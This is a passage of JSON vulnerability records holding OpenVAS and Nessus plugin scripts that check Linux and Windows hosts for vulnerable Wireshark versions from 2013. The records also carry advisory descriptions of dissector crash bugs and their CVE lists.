packaged\nseparately to GTK+ package.\n\";\n\n tag_affected = \"wireshark on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-17635\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-December/124287.html\");\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.10.2~4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-3559", "CVE-2013-4932", "CVE-2013-3558", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-10-03T00:00:00", "id": "OPENVAS:1361412562310866933", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866933", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2013-17661", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2013-17661\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866933\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-03 10:10:34 +0530 (Thu, 03 Oct 2013)\");\n script_cve_id(\"CVE-2013-4920\", \"CVE-2013-4921\", \"CVE-2013-4922\", \"CVE-2013-4923\",\n \"CVE-2013-4924\", \"CVE-2013-4925\", \"CVE-2013-4926\", \"CVE-2013-4927\",\n \"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\",\n \"CVE-2013-4078\", \"CVE-2013-4079\", \"CVE-2013-4080\", \"CVE-2013-4081\",\n \"CVE-2013-4082\", \"CVE-2013-4083\", \"CVE-2013-4928\", \"CVE-2013-4929\",\n \"CVE-2013-4930\", \"CVE-2013-4931\", \"CVE-2013-4932\", \"CVE-2013-4933\",\n \"CVE-2013-4934\", \"CVE-2013-4935\", \"CVE-2013-3559\", \"CVE-2013-3558\",\n \"CVE-2013-3557\", \"CVE-2013-3555\", \"CVE-2013-3562\", \"CVE-2013-3560\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for wireshark FEDORA-2013-17661\");\n\n\n script_tag(name:\"affected\", value:\"wireshark on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-17661\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/117186.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.10.2~6.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-01T07:00:52", "description": "The installed version of Wireshark 1.6 is earlier than 1.6.16. It is,\ntherefore, affected by multiple denial of service vulnerabilities:\n\n - Errors exist in the CAPWAP and DCP ETSI dissectors that \n could allow them to crash. (Bugs 8717, 8725)\n\n - Errors exist in the HTTP dissector that could overrun\n the stack, which could result in an application crash.\n (Bug 8733)", "edition": 24, "published": "2013-06-14T00:00:00", "title": "Wireshark 1.6.x < 1.6.16 Multiple DoS Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4083", "CVE-2013-4081", "CVE-2013-4074"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:wireshark:wireshark"], "id": "WIRESHARK_1_6_16.NASL", "href": "https://www.tenable.com/plugins/nessus/66894", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66894);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2013-4074\", \"CVE-2013-4081\", \"CVE-2013-4083\");\n script_bugtraq_id(60448, 60500, 60504, 60505);\n\n script_name(english:\"Wireshark 1.6.x < 1.6.16 Multiple DoS Vulnerabilities\");\n script_summary(english:\"Does a version check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains an application that is affected by\nmultiple denial of service vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Wireshark 1.6 is earlier than 1.6.16. It is,\ntherefore, affected by multiple denial of service vulnerabilities:\n\n - Errors exist in the CAPWAP and DCP ETSI dissectors that \n could allow them to crash. (Bugs 8717, 8725)\n\n - Errors exist in the HTTP dissector that could overrun\n the stack, which could result in an application crash.\n (Bug 8733)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-32.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-39.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-41.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Wireshark version 1.6.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wireshark:wireshark\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"wireshark_installed.nasl\");\n script_require_keys(\"SMB/Wireshark/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each install.\ninstalls = get_kb_list_or_exit(\"SMB/Wireshark/*\");\n\ninfo = '';\ninfo2 = '';\n\nforeach install(keys(installs))\n{\n if (\"/Installed\" >< install) continue;\n\n version = install - \"SMB/Wireshark/\";\n\n if (version =~ \"^1\\.6\\.([0-9]|1[0-5])($|[^0-9])\")\n info +=\n '\\n Path : ' + installs[install] +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.6.16\\n';\n else\n info2 += 'Version ' + version + ', under ' + installs[install] + ' ';\n}\n\n# Remove trailing space on info2\nif (strlen(info2) > 1)\n info2 = substr(info2, 0, strlen(info2) -2);\n\n# Report if any were found to be vulnerable\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 4) s = \"s of Wireshark are\";\n else s = \" of Wireshark is\";\n\n report =\n '\\n' + 'The following vulnerable instance' + s + ' installed :' +\n '\\n' +\n info;\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nif (info2) exit(0, \"The following installed instance(s) of Wireshark are not affected : \" + info2 + \".\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T11:54:12", "description": "Multiple vulnerabilities has been found and corrected in wireshark :\n\n - The ASN.1 BER dissector could crash (CVE-2013-3557).\n\n - The CAPWAP dissector could crash (CVE-2013-4074).\n\n - The HTTP dissector could overrun the stack\n (CVE-2013-4081).\n\n - The DCP ETSI dissector could crash (CVE-2013-4083).\n\nThis advisory provides the latest version of Wireshark (1.6.16) which\nis not vulnerable to these issues.", "edition": 25, "published": "2013-06-13T00:00:00", "title": "Mandriva Linux Security Advisory : wireshark (MDVSA-2013:172)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4083", "CVE-2013-4081", "CVE-2013-3557", "CVE-2013-4074"], "modified": "2013-06-13T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:dumpcap", "p-cpe:/a:mandriva:linux:rawshark", "p-cpe:/a:mandriva:linux:tshark", "p-cpe:/a:mandriva:linux:lib64wireshark-devel", "p-cpe:/a:mandriva:linux:wireshark-tools", "p-cpe:/a:mandriva:linux:wireshark", "p-cpe:/a:mandriva:linux:lib64wireshark1"], "id": "MANDRIVA_MDVSA-2013-172.NASL", "href": "https://www.tenable.com/plugins/nessus/66881", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:172. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66881);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-3557\", \"CVE-2013-4074\", \"CVE-2013-4081\", \"CVE-2013-4083\");\n script_bugtraq_id(60021, 60500, 60504, 60505);\n script_xref(name:\"MDVSA\", value:\"2013:172\");\n\n script_name(english:\"Mandriva Linux Security Advisory : wireshark (MDVSA-2013:172)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in wireshark :\n\n - The ASN.1 BER dissector could crash (CVE-2013-3557).\n\n - The CAPWAP dissector could crash (CVE-2013-4074).\n\n - The HTTP dissector could overrun the stack\n (CVE-2013-4081).\n\n - The DCP ETSI dissector could crash (CVE-2013-4083).\n\nThis advisory provides the latest version of Wireshark (1.6.16) which\nis not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.6.15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dumpcap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:rawshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"dumpcap-1.6.16-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.6.16-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wireshark1-1.6.16-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"rawshark-1.6.16-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tshark-1.6.16-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"wireshark-1.6.16-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"wireshark-tools-1.6.16-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T09:47:54", "description": "Multiple vulnerabilities were discovered in the dissectors for CAPWAP,\nGMR-1 BCCH, PPP, NBAP, RDP, HTTP, DCP ETSI and in the Ixia IxVeriWave\nfile parser, which could result in denial of service or the execution\nof arbitrary code.", "edition": 16, "published": "2013-06-18T00:00:00", "title": "Debian DSA-2709-1 : wireshark - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4076", "CVE-2013-4078", "CVE-2013-4075", "CVE-2013-4083", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4074", "CVE-2013-4077"], "modified": "2013-06-18T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:wireshark", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2709.NASL", "href": "https://www.tenable.com/plugins/nessus/66910", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2709. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66910);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-4074\", \"CVE-2013-4075\", \"CVE-2013-4076\", \"CVE-2013-4077\", \"CVE-2013-4078\", \"CVE-2013-4081\", \"CVE-2013-4082\", \"CVE-2013-4083\");\n script_bugtraq_id(60495, 60499, 60500, 60501, 60502, 60504, 60505, 60506);\n script_xref(name:\"DSA\", value:\"2709\");\n\n script_name(english:\"Debian DSA-2709-1 : wireshark - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered in the dissectors for CAPWAP,\nGMR-1 BCCH, PPP, NBAP, RDP, HTTP, DCP ETSI and in the Ixia IxVeriWave\nfile parser, which could result in denial of service or the execution\nof arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/wireshark\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2709\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wireshark packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.8.2-5wheezy4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libwireshark-data\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libwireshark-dev\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libwireshark2\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libwiretap-dev\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libwiretap2\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libwsutil-dev\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libwsutil2\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"tshark\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"wireshark\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"wireshark-common\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"wireshark-dbg\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"wireshark-dev\", reference:\"1.8.2-5wheezy4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"wireshark-doc\", reference:\"1.8.2-5wheezy4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T07:00:54", "description": "The installed version of Wireshark 1.8 is earlier than 1.8.8. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Errors exist in the CAPWAP, DCP ETSI, GSM CBCH, GMR-1 \n BCCH, PPP, NBAP, RDP dissectors that could allow them to\n crash. (Bugs 7664, 7880, 8697, 8717, 8725, 8726, 8727, \n 8729, 8730)\n\n - An error exists in the Assa Abloy R3 dissector that\n could cause a denial of service, resulting in\n consumption of excessive memory and CPU. (Bug 8764)\n\n - An error exists in the HTTP dissector that could overrun\n the stack, which could result in an application crash.\n (Bug 8733)\n\n - An error exists in the Ixia IxVeriWave file parser that\n could overflow the heap, resulting in consumption of\n excessive CPU resources and crash. (Bug 8760)", "edition": 24, "published": "2013-06-14T00:00:00", "title": "Wireshark 1.8.x < 1.8.8 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4079", "CVE-2013-4076", "CVE-2013-4078", "CVE-2013-4075", "CVE-2013-4083", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4080", "CVE-2013-4074", "CVE-2013-4077"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:wireshark:wireshark"], "id": "WIRESHARK_1_8_8.NASL", "href": "https://www.tenable.com/plugins/nessus/66895", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66895);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\n \"CVE-2013-4074\",\n \"CVE-2013-4075\",\n \"CVE-2013-4076\",\n \"CVE-2013-4077\",\n \"CVE-2013-4078\",\n \"CVE-2013-4079\",\n \"CVE-2013-4080\",\n \"CVE-2013-4081\",\n \"CVE-2013-4082\",\n \"CVE-2013-4083\"\n );\n script_bugtraq_id(\n 60448,\n 60495,\n 60498,\n 60499,\n 60500,\n 60501,\n 60502,\n 60503,\n 60504,\n 60505,\n 60506\n );\n\n script_name(english:\"Wireshark 1.8.x < 1.8.8 Multiple Vulnerabilities\");\n script_summary(english:\"Does a version check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Wireshark 1.8 is earlier than 1.8.8. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Errors exist in the CAPWAP, DCP ETSI, GSM CBCH, GMR-1 \n BCCH, PPP, NBAP, RDP dissectors that could allow them to\n crash. (Bugs 7664, 7880, 8697, 8717, 8725, 8726, 8727, \n 8729, 8730)\n\n - An error exists in the Assa Abloy R3 dissector that\n could cause a denial of service, resulting in\n consumption of excessive memory and CPU. (Bug 8764)\n\n - An error exists in the HTTP dissector that could overrun\n the stack, which could result in an application crash.\n (Bug 8733)\n\n - An error exists in the Ixia IxVeriWave file parser that\n could overflow the heap, resulting in consumption of\n excessive CPU resources and crash. (Bug 8760)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-32.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-33.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-34.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-35.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-36.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-37.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-38.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-39.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-40.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-41.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Wireshark version 1.8.8 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wireshark:wireshark\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"wireshark_installed.nasl\");\n script_require_keys(\"SMB/Wireshark/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each install.\ninstalls = get_kb_list_or_exit(\"SMB/Wireshark/*\");\n\ninfo = '';\ninfo2 = '';\n\nforeach install(keys(installs))\n{\n if (\"/Installed\" >< install) continue;\n\n version = install - \"SMB/Wireshark/\";\n\n if (version =~ \"^1\\.8\\.[0-7]($|[^0-9])\")\n info +=\n '\\n Path : ' + installs[install] +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.8.8\\n';\n else\n info2 += 'Version ' + version + ', under ' + installs[install] + ' ';\n}\n\n# Remove trailing space on info2\nif (strlen(info2) > 1)\n info2 = substr(info2, 0, strlen(info2) -2);\n\n# Report if any were found to be vulnerable\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 4) s = \"s of Wireshark are\";\n else s = \" of Wireshark is\";\n\n report =\n '\\n' + 'The following vulnerable instance' + s + ' installed :' +\n '\\n' +\n info;\n security_warning(port:port, extra:report);\n }\n else 